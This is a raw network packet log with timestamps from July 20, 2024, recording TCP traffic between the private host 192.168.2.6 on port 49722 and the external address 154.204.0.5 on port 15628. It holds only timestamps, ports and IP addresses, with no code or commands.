Jul 20, 2024 16:31:24.003963947 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.004081964 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.009277105 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.009339094 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.014586926 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.014646053 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.019746065 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.019799948 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.025130987 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.025187969 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.036169052 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.036246061 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.045069933 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.045149088 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.055006981 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.055104971 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.060595036 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.060681105 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.065623045 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.065704107 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.076647997 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.076728106 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.091587067 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.091695070 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.105454922 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.105665922 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.127405882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.127706051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.133310080 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.133383036 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.140240908 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.140299082 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.146841049 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.146897078 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.168342113 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.168420076 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.175071001 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.175136089 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.182054996 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.182110071 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.188011885 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.188066006 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.193445921 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.193500996 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.199598074 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.199657917 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.205591917 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.205661058 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.221865892 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.221926928 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.233354092 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.233473063 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.243918896 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.243983984 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.250478029 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.250543118 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.258291960 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.258353949 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.263359070 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.263416052 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.290821075 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.298631907 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.298708916 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.313175917 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.313241005 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.327589989 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.327651978 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.338452101 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.338522911 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.360264063 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.360362053 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.378074884 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.378189087 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.386156082 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.386302948 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.392252922 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.392339945 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.398926020 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.399120092 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.405108929 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.405245066 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.412264109 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.412467957 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.439878941 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.440469027 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.440574884 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.447566032 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.447671890 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.448579073 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.448673010 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.462589979 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.463006020 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.468285084 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.468461037 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.473802090 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.473957062 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.478991032 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.479846001 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.484983921 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.485316992 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.494405985 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.495621920 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.501055956 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.503853083 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.509473085 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.513786077 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.525197029 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.525446892 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.533848047 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.533970118 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.541260958 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.541408062 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.546787024 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.547230959 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.553309917 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.555675983 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.560920000 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.561147928 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.572248936 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.572508097 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.577894926 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.578232050 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.583765030 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.583957911 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.588814974 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.589202881 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.594558001 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.597879887 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.603940964 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.604211092 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.609744072 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.613826990 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.620106936 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.620255947 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.640867949 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.648152113 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.648670912 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.648883104 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.656186104 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.657620907 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.664040089 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.665626049 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.671693087 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.672072887 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.677525043 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.681608915 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.689214945 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.689455032 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.695079088 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.695167065 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.700532913 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:24.700690985 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.734245062 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.757472038 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.779714108 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.802123070 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.824388981 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.849646091 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.880604029 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.899280071 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.922877073 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.925825119 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.945445061 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.968776941 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:24.991677046 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.013459921 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.032840967 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.065459013 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.089462042 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.109435081 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.131694078 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.161467075 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.178746939 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.178791046 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.178817987 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.178994894 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.180263042 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.180516005 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.181040049 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.181088924 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.181116104 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.181119919 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.181328058 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.181536913 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.182188034 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.182219028 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.182245016 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.182337999 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.182396889 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.183123112 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.183150053 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.183269978 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.183296919 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.183516026 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.184856892 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.185746908 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.186321974 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.186975956 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.187892914 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.187977076 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.188905001 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.189060926 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.191823959 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.192859888 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.193088055 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.194053888 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.194267988 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.198333979 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.198523045 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.199611902 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.199704885 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.203496933 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.203680992 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.204576969 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.204834938 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.210576057 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.213737965 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.218772888 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.221616983 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.233002901 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.233107090 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.238058090 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.241631031 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.246721029 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.249865055 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.257317066 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.257560968 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.275968075 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.276457071 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.282073021 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.285634995 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.290647030 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.292474985 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.302412987 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.304038048 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.326756954 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.334328890 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.335721970 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.356686115 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.357606888 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.363203049 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.365562916 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.373557091 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.377593040 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.384334087 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.386373043 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.392687082 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.392966986 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.400901079 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.401559114 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.418709993 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.421561003 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.429301977 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.429502010 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.442348003 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.445589066 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.456717968 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.456801891 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.462711096 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.462773085 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.467819929 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.467885017 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.472867012 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.472923040 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.477852106 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.477905989 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.483335972 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.483392954 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.488698959 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.488749981 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.493712902 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.493772984 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.500646114 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.500708103 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.505908012 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.505971909 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.511172056 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.511306047 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.517349005 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.517404079 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.524116993 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.524167061 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.529611111 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.529674053 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.535200119 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.535244942 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.540613890 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.540671110 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.545886993 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.545938015 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.553808928 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.553868055 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.558823109 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.558873892 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.563874960 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.563925982 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.569406033 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.569461107 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.575198889 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.575252056 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.580612898 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.580661058 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.586041927 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.586091042 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.591700077 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.591754913 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.597982883 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.598037004 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.603579998 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.603627920 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.609289885 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.609349966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.616504908 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.616555929 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.625117064 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.625176907 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.650382042 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.650440931 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.664212942 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.664290905 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.675683975 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.675751925 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.709295034 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.709361076 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:25.723236084 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:25.729669094 CEST	49722	15628	192.168.2.6	154.204.0.5
